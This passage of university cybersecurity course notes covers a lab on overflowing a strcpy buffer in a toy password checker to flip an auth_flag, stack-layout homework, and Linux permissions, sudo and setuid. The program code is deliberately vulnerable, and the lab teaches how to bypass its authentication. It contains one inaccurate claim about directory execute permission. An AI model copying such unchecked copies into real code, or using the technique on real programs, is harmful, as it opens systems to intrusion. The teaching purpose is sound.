then the program should allocate 100 bytes on the heap and place the string cyber2 on the heap. However, when
your friend runs the program, it seems to execute for 30 seconds or so, and then presents a very unpleasant message:
Your friend knows that you are a genius taking the Cyber-2 course, so she has asked you for help. Her program is
shown below. Enter the following program and run it. What is causing your friend's program to crash?
#include<stdio.h>
#include<string.h>
#include<stdlib.h>          /* declares atoi and malloc */
int main( int argc , char *argv[ ] )
{
    char *ptr ;
    int size;
    int i;
    size = atoi( argv[ 1 ] ) ;
    for(i=0; i=size; i=i+1)
    {
        ptr = ( char* ) malloc( size );
        strcpy( ptr , argv[ 2 ] );
    }
}
3. Explain, in your own words, how a buffer overflow occurs in memory.
4. Given the following variable declarations and stack diagram (no padding) for a game:
char user[16];
int highscore;
char nickname[x];

Address          Value          Variable
0xbffff800 ->                   <- nickname
0xbffff80c ->    1000           <- highscore
0xbffff810 ->    lynn           <- user
0xbffff820 ->    0xbffff840     <- Saved ebp
0xbffff824 ->    0x080483e0     <- Return Address

This program allows you to enter your nickname when you run it from the command line.
./game nickname
(a) What is the value of 'x'? (# of bytes allocated for nickname)
(b) How many bytes must you put into nickname to completely overwrite highscore?
(c) How could you change the above variable declarations to ensure highscore could not be overwritten?
(d) What is the minimum number of bytes that you can put into nickname to crash the program?
(e) What string can you put into nickname to overwrite highscore with value 16963?
5. Is it possible for the heap and stack to collide? Choose the answer below which most correctly answers this question:
(a) Yes, because the stack builds from the bottom (larger memory address) up (to a smaller memory address)
and the heap from the top (smaller memory address) down (to a larger memory address).
(b) Yes, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and
the stack from the top (smaller memory address) down (to a larger memory address).
(c) No, because the stack builds from the bottom (larger memory address) up (to a smaller memory address) and
the heap from the top (smaller memory address) down (to a larger memory address).
(d) No, because the heap builds from the bottom (larger memory address) up (to a smaller memory address) and
the stack from the top (smaller memory address) down (to a larger memory address).
Security Exercise 8
"There are people who make things happen, there are people who watch things happen, and there are people who wonder
what happened. To be successful, you need to be a person who makes things happen."
Part 1. Background and Initial Setup
USMA Exchange Cadet Lessheimer and his friend, Exchange Cadet Geekenstein, have written a program to control access to
the USMA Knowledge Database (which is a very small text file).
The idea is this: To be granted access to the USMA Knowledge Database, when you run the program you also enter a password
on the command line. If you enter a valid password, you are granted access. If you enter an invalid password you are denied
access.
You start by surreptitiously looking in the trash can outside the cadet’s room. Amidst the candy-bar wrappers, Doritos bags
and empty Kool-Aid containers, you find a piece of paper labeled SECRET SOURCE CODE. Looking at the paper, you see
the program below:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int check_password( char *password )
{
    int auth_flag = 0;
    char password_buffer[16];
    strcpy( password_buffer, password );
    if(strcmp( password_buffer, "donkey" ) == 0)
        auth_flag = 1;
    if(strcmp( password_buffer, "gousma" ) == 0)
        auth_flag = 1;
    return auth_flag;
}
int main(int argc, char *argv[])
{
    if(argc < 2)
        exit(0);
    if ( check_password( argv[1] ) == 0 )
        printf("\n\n   Access Denied.\n\n");
    else
        printf("\n\n   Access Granted.\n\n");
}
You have typed this program into the file named accesscontrol.c. To save you the trouble of typing, we have already
placed this file on your machine in the EC310 folder under your home directory.
Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at
your home directory!):
midshipman@EC310:~ $ cp ec310code/accesscontrol.c work
Verify that you have accesscontrol.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
If you do not have accesscontrol.c in your work directory STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 2.
Part 2. Gaining Access by Buffer Overflow
Before compiling and executing the program, let's first see if we can understand its operation.
Suppose I were to run the program (./a.out) by entering at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
Question 1.
If I ran the program as above, what would be the value of argc?
Question 2.
If I ran the program as above, what would be the value of argv[0]?
Question 3.
If I ran the program as above, what would be the value of argv[1]?
Question 4.
Where does this program begin executing?
Question 5.
What is the purpose of the two lines:
if(argc < 2)
exit(0);
Question 6.
In main, what is the value of the argument that we give to the function named
check_password? (Recall our input as depicted in the command line shown above.)
Question 7.
What happens in main if the function named check_password returns a value of 0?
Question 8.
What happens in main if the function named check_password returns a value other than 0?
Question 9.
Finish this sentence: The function check_password returns the value of the variable named
auth_flag. For access to be denied in main, the value of auth_flag that is returned must
be equal to ____.
Question 10.
Let's look at the function check_password . After the line of code:
strcpy( password_buffer, password );
executes, what will be stored in password_buffer?
Recall that the function string compare, strcmp, in the generic line of code
value = strcmp( s1 , s2 );
compares the strings s1 and s2 character by character. The function returns zero if the two strings are equal (i.e., identical).
Question 11.
Recalling our presumption that you entered at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
will either of the two strcmp operations in the function check_password return a value of
zero?
Question 12.
Will the function check_password return to main a value equal to zero, or will it return
something other than zero?
Question 13. If you enter at the command line:
midshipman@EC310-VM:~ $ ./a.out Navy
what message will be sent to the screen?
At this point, if you are confused by the operation of the program (on paper), ask your instructor for help.
Let's now compile the program:
gcc -g accesscontrol.c
and run the program. Try out executing the program with a few different command line inputs. You should see that the two
secret passwords that will allow access are donkey and gousma . So, you can enter one of these passwords and gain
access!
But that is not your goal. The cadets might, in the future, change their passwords, in which case you will have to try to find a
new version of the source code. Your goal is to find a way to hack the cadet's program so that even if they change the passwords
you will be able to gain access.
Determine a password that you can enter that will always allow access, regardless of the actual passwords being used by the
cadets!
Enter the following commands:
gcc -g accesscontrol.c
gdb -q ./a.out
set dis intel
list check_password
<Enter>
list main
<Enter>
Here is what you would like to accomplish: You notice that in the function check_password, the variable auth_flag is
initially set to zero. The only way auth_flag is ever changed is if we enter the correct password. But… perhaps we can
change the value of auth_flag by executing a buffer overflow without needing to worry about the correct password!!!
Perhaps the incorrect password you enter as the command line argument can be used to change the value of auth_flag !!!
STEP 1: Determine the proper breakpoint for your program.
You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where
should you set the breakpoint? Looking at the listing on your screen, you want to set the breakpoint to be at a point where you
can examine how the command line argument (i.e., what you enter as the pretend password) is situated with respect to the
variable auth_flag.
Question 14:
Where should you set the breakpoint?
STOP and show your instructor or lab tech your answer to Question 14. With their okay, proceed to Step 2 below.
STEP 2: Run to the breakpoint and examine the stack.
To enter a breakpoint for a program that requires command line arguments (where, let’s say, the command line argument is
Navy, you would enter:
break <whatever number you have for Question 14>
run Navy
For example, if you answered Question 14 by deciding the breakpoint should be at line 4, you would enter:
break 4
run Navy
Now, examine the stack by entering
i r esp
i r ebp
Question 15:
How many bytes are on the stack?
Question 16:
Whose stack frame is this anyway? Is this the stack frame for main?
Examine the stack by entering
x/60xb $esp
Question 17:
Fill in the values in the table below, showing where the base pointer (label as EBP-check_password) and stack pointer
(label as ESP-check_password) are pointing. Label these addresses on your picture.
Question 18:
Locate on the stack the command line argument (your pretend password) and the variable auth_flag. Show these on the
table below, labeling them as password_buffer and auth_flag.
STEP 3: Determine the attack technique.
Question 19:
Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how
your attack works in the answer space for Question 19.
Question 20:
Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech
will sign off on this.
The program used in this lab was adapted from a program presented in Hacking, the Art of Exploitation, by Jon Erickson, No
Starch Press, 2008.
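For contrast with the lab program, here is an added example (not the lab's code, and not the answer to the exercise) of check_password written so that the password argument is never copied unless it fits in the buffer, which is the fix a code reviewer would ask for. The name check_password_safe and the PASSWORD_BUFFER_SIZE constant are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the lab's code. The lab's check_password copies its
 * argument into a 16-byte buffer with strcpy and no length check, so the
 * copy can run past the buffer into whatever the compiler placed next to it
 * (auth_flag among other things). This version refuses anything that will
 * not fit, so the copy can never leave password_buffer. */

#define PASSWORD_BUFFER_SIZE 16   /* same size as the lab's buffer */

int check_password_safe(const char *password)
{
    int auth_flag = 0;
    char password_buffer[PASSWORD_BUFFER_SIZE];

    /* A password that fits has at most 15 characters plus the terminating
     * NULL. Anything longer is denied before a single byte is copied. */
    if (password == NULL || strlen(password) >= PASSWORD_BUFFER_SIZE)
        return 0;

    /* Length was just checked, so this copy (including the NULL) stays
     * inside password_buffer and auth_flag cannot be touched. */
    memcpy(password_buffer, password, strlen(password) + 1);

    if (strcmp(password_buffer, "donkey") == 0)
        auth_flag = 1;
    if (strcmp(password_buffer, "gousma") == 0)
        auth_flag = 1;
    return auth_flag;
}

int main(int argc, char *argv[])
{
    if (argc < 2)
        exit(0);
    if (check_password_safe(argv[1]) == 0)
        printf("\n\n   Access Denied.\n\n");
    else
        printf("\n\n   Access Granted.\n\n");
    return 0;
}
```

The real passwords still grant access, a wrong one of any length is denied, and an over-long argument is rejected instead of written to the stack.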
Security Exercise 8 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
Question 16:
Question 17 and Question 18: (Note: Each line in the table below represents four bytes.)
Address
Contents
Question 19:
Question 20: When you have successfully hacked the cadet's program, show your instructor. Your instructor will sign your
answer sheet.
_________________________________
Instructor or Lab Tech signature
Chapter 9: Privilege Management
Objectives:
(a) Describe how permissions are managed and controlled in a multi-user OS environment.
(b) Explain how users can be afforded the limited ability to execute commands with escalated privileges.
1. Files in C
1.1. Introduction We can use the C language to open files, read from files, write to files and close files. In C, a file name is
tied to an integer called the file descriptor. Once we tie a file name to a file descriptor, we work only with the file descriptor.
1.2. Opening a File Let's look at a C program that I've named fun_with_files.c, which opens a file named stuff:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
int main( int argc , char *argv[ ] )
{
    int fd ;
    fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
    printf("The assigned value of the file descriptor is %d\n",fd);
    if ( fd == -1 )
    {
        printf( "\nFailed to open.\n");
    }
}
(The lines #include<fcntl.h> and #include<sys/stat.h> tell the compiler that your program intends to use files. If you
will be using files, just (blindly!) include these two lines. The line beginning fd = open( ... ) should be the only line that
looks insane to you! Do not fear! This line will be explained below.)
Notice first that we have a few new #include directives at the top of the program. These are necessary for C to work
with files. Don’t worry about these lines of code (other than ensuring that they are at the top of the program).
The only craziness in the program is the line:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
At its heart, this line of code ties the file named stuff to an integer value which is placed in the variable fd. This line of
code essentially asks the C compiler:
“I, the programmer, want to use the file named stuff. I might want to read what is in it. I might want to write to it.
I know that you, the C compiler, do not want to see the file name (in this case, stuff) running around the program,
so give me an integer to use as a stand-in for the file named stuff, and place that integer in the variable that I’ve
named fd. Then, later, if I want to do something with the file named stuff, I’ll just refer to the integer fd”
So, let's run the program and see what happens! First, I will look at my home directory:
Now, I will compile and run the program:
We see that C assigned the file named stuff to the file descriptor value of 3 (i.e., fd = 3). If, when dealing with files, the
open call simply cannot figure out what to do, it will return the integer -1 as the file descriptor. That is why we placed that
final if statement at the end—in order to check whether open encountered some difficulty.
At this point, you might be thinking: "Okay, so what? What did the program do?"
Well, if I now list the files in my home directory once again, I see:
Notice that the file stuff now exists!
1.3. Looking at a File So far, we have looked at files using the nano editor. Oftentimes we want to look at the contents of
a file, with no intention whatsoever to edit the file. In cases where we merely want to view the contents of a file, there is no
need to open an editor. Linux provides us with the cat command. The command
cat filename
will display the contents of the file named filename.
For example, if I enter:
cat fun_with_files.c
I see the contents of the file named fun_with_files.c.
Let's observe the contents of the file named stuff using cat:
and I see … nothing.
At this point, you might be thinking: "Okay, so what? What did the program do?"
1.4. Writing to a File Let's answer the question: "What did the program do?" The program did create the file named stuff,
but that is all it did. Specifically, it did not write any contents to the file. The file has been created, but is empty. So, when
we used the cat command to display the contents of the file named stuff, we did indeed see the contents: nothing.
So, let’s modify our program so that we can add content to our file. Before presenting the program, we need to introduce two
additional string functions:
• strnlen( buffer , n ) returns the length of the string named buffer (the number of characters before the terminating
  NULL), examining no more than n bytes. The second argument is required.
• strncat( buffer , "\n" , 1 ) adds a new-line character to the end of the string buffer.
Practice Problem 9.1
What is the output of the program shown below?
#include<stdio.h>
#include<string.h>
int main( int argc , char *argv[ ] )
{
    char my_string[15] = "USNA Rules!" ;
    printf( "The string is %s" , my_string ) ;
    printf("The string's length is: %d\n" , (int) strnlen( my_string , 15 ) );
    strncat( my_string , "\n" , 1 ) ;
    strncat( my_string , "\n" , 1 ) ;
    printf( "The string is %s" , my_string ) ;
    printf("The string's length is: %d\n" , (int) strnlen( my_string , 15 ) );
}
Solution:
Notice that the strnlen function does not count the terminating NULL as one of the characters in the string. The terminating
NULL (the byte of all zeroes) is certainly there (that is, after all, how the first and third printf statements above knew when
to stop), but the presumption is made that when the programmer wants to know the length of the string, the only concern is
with the number of characters preceding the NULL.
Now, armed with these two new string commands, let’s modify our program fun_with_files.c so that when we execute
the program, we will include a text string as a command line argument. The program will append the text string to the end of
the file stuff using the write command.
The next page displays our modified program, still named fun_with_files.c . Let's suppose I run this program with
the command line argument "To be a midshipman", as shown below:
1.  #include<stdio.h>
2.  #include<stdlib.h>
3.  #include<string.h>
4.  #include<fcntl.h>
5.  #include<sys/stat.h>
6.  #include<unistd.h>      /* declares write and close */
7.  int main( int argc , char *argv[ ] )
8.  {
9.      int fd ;
10.     char *buffer ;
11.
12.     buffer = (char *)malloc(100);
13.
14.     strcpy( buffer , argv[ 1 ] );
15.
16.     strncat( buffer , "\n" , 1 );
17.
18.     fd = open("stuff", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
19.
20.     if ( fd == -1 )
21.     {
22.         printf( "\nFailed to open.\n");
23.         exit(0);
24.     }
25.     write( fd , buffer , strnlen( buffer , 100 ) );
26.
27.     free( buffer );
28. }
Line 9 declares the integer variable that will hold the file descriptor. Recall that the file descriptor is just a stand-in for the
name of the file we will be reading from and writing to.
Line 10 declares a string named buffer that, in line 12, is allocated 100 bytes of space on the heap. Line 14 copies argv[1]
into buffer , and line 16 adds a newline character to the end of the string named buffer.
At line 17, the picture of our program in main memory looks like this:
Now, line 18 ties the file named stuff to a file descriptor. Lines 20-24 are added to the program so that the user is informed
if the compiler had some trouble opening the file.
The key line of the program that actually adds something to our file named stuff is line 25:
write( fd , buffer , strnlen( buffer , 100 ) );
This writes the data pointed to by buffer (which in this case is the string To be a midshipman followed by a new
line) into the file whose file descriptor is fd (which is the file named stuff). The third argument to the function tells how
many bytes to write.
Let’s run the program, showing the contents of the file named stuff.
Let's run this program two more times, examining the file named stuff along the way:
If I decide to look at the file named stuff using nano, I see:
Practice Problem 9.2
What would happen if we did not have quotation marks in our command line arguments above?
Solution:
You should appreciate the fact that the file stuff is permanent. If you close VMware and turn off your computer, the file
stuff will be there when you turn your computer back on.
1.5. File Closing. After you have finished writing to a file, the file should be closed. The syntax to close a file is
close( fd );
Again, note that closing a file doesn't delete it! The file is still there, and, if opened by a program later will be in precisely the
same condition it was in before it was closed. So, to make the preceding program perfect, we should close the file by adding
this line to the end of the program.
2. Linux Access Privileges
2.1 File Access for Reading, Writing and Executing. Every file has access privileges that control who can read, write and
execute the file. Every directory has similar privileges, but, for directories, read means “read the contents of the directory,”
write means “add or remove files from the directory” and execute means copy files from the directory.
You can see the access privileges for a file or directory by entering the ls –l command. The –l stands for long; that is,
we want the long listing! A line produced by this command (one line will be produced for each file and directory) might look
like this:
-rwxr-x--x 1 jones happymids 1024 July 16 17:12 happy_times.exe
Here is what the various fields in this line mean:
-                 The dash indicates a file. If this line item was a directory, the first symbol would have been a d.
rwxr-x--x         The access privileges. This is our main focus for today… more on this below!
1                 The number of links to the file.
jones             The file owner.
happymids         The file owner also belongs to this group.
1024              The file size.
July 16 17:12     The file creation date.
happy_times.exe   The file name.
The important points above: (1) The file is named happy_times.exe and (2) the owner of the file is jones and (3) the
access privileges are rwxr-x--x.
Let’s look more closely at the nine symbols that comprise the access privileges. The symbols used are:
• r for read (which also allows the copying of the file)
• w for write
• x for execute
• - for no access
The first three symbols (i.e., the first triplet) refer to the file owner, the second triplet refers to the owner's group and the third
triplet refers to the general public (everyone who has an account on your system).
So, given the access privileges that we see in the example above:
• The owner (jones) can read, write to and execute the file happy_times.exe.
• The group (happymids) can read and execute the file happy_times.exe but cannot write to it.
• The general public can do nothing other than execute the file happy_times.exe.
The access privileges are called the mode of the file or directory. The owner of a file can change the access privileges for a
file using the change mode (chmod) command. The command’s format is:
Practice Problem 9.3
What are the access privileges for happytimes.exe after the command shown above is entered?
Solution:
Practice Problem 9.4
What command would remove the ability for the public to execute happytimes.exe?
Solution:
Practice Problem 9.5
What single command using the assign operator would assign the public the ability to read and execute happytimes.exe?
Solution:
It should be reiterated that only the owner can change a file's mode. Wait… that's not right… who else can change a file's
mode?
Practice Problem 9.6
Who, besides the file's owner, can change a file's mode?
Solution:
Practice Problem 9.7
And just how does one get to be the owner of a file anyway?
Solution:
3. Giving Up a Little Control with sudo and setuid
3.1. User Accounts Let's take our earlier program, fun_with_files.c and—since we are eight pages into this chapter
and no longer having much fun—rename it as: note1.c. Recall that this program takes a text string as a command line
argument, and appends the text string to the end of a file. Let's give the file we read from and write to the more practical name
of notes. This file named notes will reside in the /tmp directory.
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<fcntl.h>
#include<sys/stat.h>
#include<unistd.h>      /* write and close */
int main( int argc , char *argv[ ] )
{
    int fd ;
    char *buffer ;
    buffer = (char *)malloc(100);             /* 100 bytes on the heap for the note */
    strcpy( buffer , argv[ 1 ] );             /* copy the command line argument into buffer */
    strncat( buffer , "\n" , 1 );             /* and add a newline */
    fd = open("/tmp/notes", O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
    if ( fd == -1 )
    {
        printf( "\nFailed to open.\n");
    }
    write( fd , buffer , strlen( buffer ) );  /* append the note to the file */
    free( buffer );
    close( fd );
}
When we compile a program, the executable object code file is named a.out. We can change the name of the object code to
a name of our choosing by using the –o specifier. In the screen capture below, I named the executable code as note1.exe.
Let’s look at the read, write and execute permissions for the source code (note1.c), the object code (note1.exe) and the
text file that this program creates and writes to (/tmp/notes):
It would seem that the executable program that we wrote (note1.exe) can be executed by anyone, but the file /tmp/notes
can only be read and written to by the user named midshipman (since the file is owned by user midshipman).
How many users have accounts on our system? How can we find out? Recall that in Linux, every user is given a directory
under the home directory. So, let's see who has folders under the home directory.
There is one user that is not shown on this list: the user named root. Of all accounts on a Linux system, the account named
root has special privileges and full access rights over the entire system. The root account is owned by the system
administrator, and has the ability to read, write and execute all files in anyone’s account.
Each user who has an account on a Linux system has a unique user ID number, which you can determine by using the id
command. For example, to determine the unique ID number for joe, we enter
If we do this for all users we determine the following IDs:
root         0
mia          500
joe          501
instructor   998
midshipman   999
There is a command that allows us to switch users… to switch from midshipman to, say joe. This command is the su
command. Let’s try it!
This command failed! The su command asks for the password of the target account (in this case, joe’s password). The only
time a password will not be asked for is if the su command is entered by the root user! Hopefully you will agree that it
makes sense to restrict this command to run without a password only for the system administrator!
If we wanted to switch to the root user, we would type just su, but, again, this will ask for the root user’s password.
Since executing commands as the root user is potentially very dangerous, Linux provides a more restricted version of the su
command, called sudo. Using sudo allows us to execute a single command as the root user. After using sudo, the very
next command will revert you back to the privileges of your account.[14]
Since using sudo gives you root privileges (even for only a single command), a user is prompted for a password every time
they use sudo. This should make sense, since if anyone could use the sudo command, then anyone can act as the root user,
one command at a time.
In a Linux system, the system administrator (root) may give a few trusted assistants sudo privileges.
In order for you to explore privilege management, and get a fuller understanding of how permissions are managed behind the
scenes, your textbook author (Jon Erickson) has set up your VMware software so that you, the user midshipman, can use the
sudo command without a password. This will allow you to switch your identity to that of other users in order to see the
system from their perspective. You must always keep in mind that this is not something that an ordinary user would ever be
able to do.
(http://xkcd.com)
So… let’s use sudo to become the user joe! We enter:
sudo su joe
and see,
I’m joe![15]
3.2. The setuid Permission As joe, can I execute the program note1.exe? Looking at the permissions for this file
from Section 3.1 above, the answer would seem to be "yes". Let's try to execute note1.exe:
[14] The meaning of the acronym sudo is unclear. In some texts it is presented as "switch user (to root and) do". In some texts it is presented as "super user
do". In some texts it is presented as "substitute user (for root and) do". Of course all texts are in agreement about what the sudo command actually does!
[15] Although sudo only provides me the ability to execute one command as root, if the command is to switch to another user, you will remain as that user.
In other words, you do not revert back to the former user after one command.
The program did not work. Looking back at the program at the start of Section 3.1, it looks like we invoked the if statement:
if ( fd == -1 )
{
    printf( "\nFailed to open.\n");
}
Although joe has permission to execute the program note1.exe, joe is not permitted to write to the file notes.
Suppose we want joe to be able to execute the program note1.exe and actually make changes to the file named
/tmp/notes, but we still do not want him to be able to read or write directly to the file /tmp/notes. In other words, we
do not want joe to be able to write to the file by using, say, nano or some other program, but we do want him to be able to
write to the file provided he only does this by using the note1.exe program. You may be surprised to know that this sort of
scenario occurs quite frequently!
Linux handles this by providing a special permission called the set user ID (setuid) permission. If an executable program
has the setuid flag set, then whenever the program is executed, it will behave as though it were being executed by the
owner.
In other words, if we set the setuid flag for the file note1.exe, then when joe executes the program, the program will
run as if the owner (midshipman) was executing it. This is good because the user named midshipman is the only one
who can write to the file /tmp/notes .
The owner, midshipman, can set the setuid flag for note1.exe . Let's switch back to the user named midshipman by
typing exit, and then:
chmod u+s note1.exe
Let's do this and look at a listing of the file permissions:
Note the s in the execute field for the owner. That is the indicator that the setuid flag is set.
So… let’s go back to being joe and let’s see if joe can now add notes to /tmp/notes. We enter:
sudo su joe
then
Note that joe cannot directly read the file notes (see the permissions for /tmp/notes given in Section 3.1 above). The
only way joe can have an effect on the file /tmp/notes is through the use of the program note1.exe.
If we exit, and look at the file as midshipman:
It worked! Now joe—or anyone—can use the program (but only midshipman can read the file /tmp/notes).
Practice Problem 9.8
You are viewing the access privileges of a file exam1.sh and they read: -r-xr-xr-- .
(a) What privileges for this file are granted to the owner?
(b) You give the command chmod g-x exam1.sh . What access privilege(s) did you change and to whom do they apply?
Solution: (a)
(b)
Practice Problem 9.9
The following is the output of ls -l for the shutdown command, which is a system administration program.
We can see that it is owned by the root user (administrator) and appears to be executable by everyone. That is, in actuality, not
the case, since the program named shutdown actually calls other programs, and these other programs can only be executed
by the root user. How can the root user modify the permissions to this program to allow anyone to shut down the computer?
(Give the command, then an explanation of how it solves this problem.)
Solution:
Practice Problem 9.10
What does the sudo command accomplish?
Solution:
Practice Problem 9.11
Who can execute the sudo command?
Solution:
Practice Problem 9.12
Consider the long listing for three files, shown below. The file note1.c is a C program that writes to the file /tmp/notes.
The file note1.exe is the compiled version of note1.c.
The system has four users: midshipman, smith, jones and, of course, root.
(a) The user smith executes the file note1.exe and notices that his attempts to write to the file /tmp/notes are not
successful. Explain why.
Solution:
(b) Suppose it was necessary to grant users the ability to write to the file /tmp/notes, but only when executing the
program note1.exe. Your friend proposes two ways of accomplishing this:
    (i) Enter the command: chmod u+w /tmp/notes
    OR
    (ii) Enter the command: chmod u+s note1.exe
Which option do you select and why?
Solution:
APPENDIX[16]: More about the write command
Let’s go back to that cryptic line of code:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
and talk about the second argument to the open function
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
this second argument reads:
O_RDWR|O_CREAT|O_APPEND
The first item, O_RDWR tells the compiler that the program intends to read and write to the file stuff.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
We have two other choices for this first flag:
    If we only want the program to read a file (but never write to it): O_RDONLY
    If we only want a program to write to a file (but never read it): O_WRONLY
[16] Okay, let's end this chapter on an upbeat note: THIS APPENDIX IS NOT TESTABLE!
The second flag, O_CREAT , tells the compiler to create the file if it does not already exist.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
The third flag, O_APPEND , tells the compiler to write data by appending it to the end of the file.
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
Our cryptic line of code should now make sense except for that last (third) argument:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
Last but not least, let's discuss the third argument:
fd = open( "stuff" , O_RDWR|O_CREAT|O_APPEND , S_IRUSR|S_IWUSR );
The third argument is used to set the file permissions. The choices to place in the third argument are:
S_IRUSR   The owner has permission to read the file
S_IWUSR   The owner has permission to write to the file
S_IXUSR   The owner has permission to execute the file
S_IRGRP   The owner’s group has permission to read the file
S_IWGRP   The owner’s group has permission to write to the file
S_IXGRP   The owner’s group has permission to execute the file
S_IROTH   Anyone has permission to read the file
S_IWOTH   Anyone has permission to write to the file
S_IXOTH   Anyone has permission to execute the file
I could put as many of these choices in the third argument as I choose, separating my choices with a vertical bar.
What should be the result if I now entered:
ls -l stuff
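As an added example that is not from the notes, the following C program exercises the open() arguments from this appendix on a scratch file (the path /tmp/ec310_open_demo is an assumption) and reports what the kernel actually did: the permission bits recorded for a file created with O_CREAT and a given mode, the order of two writes made through separate descriptors opened with O_APPEND, and the error a write() gets on a descriptor opened O_RDONLY. The umask, which the appendix does not mention, is set explicitly in each function because it removes bits from the requested mode.

```c
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Assumed scratch path; every function below recreates it. */
#define DEMO_PATH "/tmp/ec310_open_demo"

/* Write all of s to fd; 0 on success, -1 on error. */
static int put(int fd, const char *s)
{
    size_t n = strlen(s);
    return write(fd, s, n) == (ssize_t)n ? 0 : -1;
}

/* O_CREAT with the requested mode: the kernel records requested & ~umask.
 * Returns the permission bits actually stored (masked with 0777), or -1.
 * The umask is set explicitly so the result does not depend on the shell. */
int create_with_mode(mode_t requested, mode_t mask)
{
    struct stat st;
    int fd, result;

    unlink(DEMO_PATH);        /* O_CREAT leaves an existing file's mode alone */
    umask(mask);
    fd = open(DEMO_PATH, O_WRONLY | O_CREAT, requested);
    if (fd == -1)
        return -1;
    result = fstat(fd, &st) == 0 ? (int)(st.st_mode & 0777) : -1;
    close(fd);
    return result;
}

/* O_APPEND: write one note per open() and read the file back through the
 * second descriptor (O_RDWR permits both directions).  Copies the content
 * into out and returns its length, or -1 on error. */
int append_two_notes(const char *first, const char *second, char *out, size_t outsz)
{
    int fd;
    ssize_t n;

    unlink(DEMO_PATH);
    umask(022);
    fd = open(DEMO_PATH, O_RDWR | O_CREAT | O_APPEND, S_IRUSR | S_IWUSR);
    if (fd == -1)
        return -1;
    if (put(fd, first) || put(fd, "\n")) { close(fd); return -1; }
    close(fd);

    /* the new descriptor starts at offset 0, yet O_APPEND sends the write to the end */
    fd = open(DEMO_PATH, O_RDWR | O_CREAT | O_APPEND, S_IRUSR | S_IWUSR);
    if (fd == -1)
        return -1;
    if (put(fd, second) || put(fd, "\n")) { close(fd); return -1; }
    lseek(fd, 0, SEEK_SET);   /* O_APPEND only affects writes, so we can rewind to read */
    n = read(fd, out, outsz - 1);
    close(fd);
    if (n < 0)
        return -1;
    out[n] = '\0';
    return (int)n;
}

/* 1 if both notes came back in order, each on its own line. */
int append_demo_ok(void)
{
    char buf[64];
    int n = append_two_notes("first note", "second note", buf, sizeof buf);
    return n == 23 && strcmp(buf, "first note\nsecond note\n") == 0;
}

/* O_RDONLY: reading is allowed, writing is not.  Returns the errno that
 * write() reports (EBADF), or 0 if the write unexpectedly succeeded. */
int write_to_readonly_fd(void)
{
    int fd, err = 0;

    create_with_mode(S_IRUSR | S_IWUSR, 022);   /* make sure the file exists */
    fd = open(DEMO_PATH, O_RDONLY);
    if (fd == -1)
        return -1;
    if (write(fd, "x", 1) == -1)
        err = errno;
    close(fd);
    return err;
}

int main(void)
{
    printf("requested 0660, umask 022 -> stored %04o\n",
           create_with_mode(S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP, 022));
    printf("O_APPEND demo: %s\n", append_demo_ok() ? "notes in order" : "failed");
    printf("write() on an O_RDONLY descriptor -> errno %d (EBADF = %d)\n",
           write_to_readonly_fd(), EBADF);
    return 0;
}
```

The first line it prints is the answer to the ls -l question above for a file created with S_IRUSR|S_IWUSR|S_IRGRP|S_IWGRP under the usual umask of 022: the group's write bit is stripped and the file shows up as -rw-r-----. Asking for a mode in open() is therefore a request, not a guarantee; check with ls -l (or fstat) when the permissions matter.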
Problems
1. Navigate to the instructor directory. You should see the prompt:
Using nano, open the file unix_basics for editing:
midshipman@EC310:/home/instructor $ nano unix_basics
Add your favorite Linux command (we realize you have several—just pick one) to the top of the file, and save the file
under the same name (Control-o). Were you successful? Why/Why not?
2. Given the following declaration
char school[20] = "US Naval Academy";
what value would be returned by each of the following function calls:
(a) strlen(school);
(b) strlen("school");
3. Concerning the C programming language:
(a) What feature of C makes a buffer overflow possible? Be specific!
(b) Who (or what) is responsible for data integrity and memory management in C? (I.e., is it the responsibility of the
compiler?)
4. Recall Problem 2 at the end of Chapter 6. The problem asked you to enter and compile the program below:
void test_function( int a, int b, int c, int d, int e)
{
    int flag;
    char buffer[ 10 ];
    flag = 1234 ;
    buffer[ 0 ] = 'U' ;
    buffer[ 1 ] = 'S' ;
    buffer[ 2 ] = 'A' ;
}
int main( )
{
    test_function( 5, 6, 7, 8 , 9 ) ;
}
The Chapter 6 problem then asked you to analyze memory to determine where various arguments and variables were
stored in memory.
In this exercise we will repeat the problem, but by using just the assembly language. Additionally, you do not need
to enter or recompile the program! You should answer all questions by only using the screen captures provided
below.
Consider the screen capture below, which was taken after pausing the program just before the function call (i.e., while
still in main's stack frame):
(a) Sketch a picture of the stack frame for main. In your diagram, show where the base pointer and stack pointer
are pointing to (label these as EBP-main and ESP-main), and show where the arguments to test function
are stored in memory.
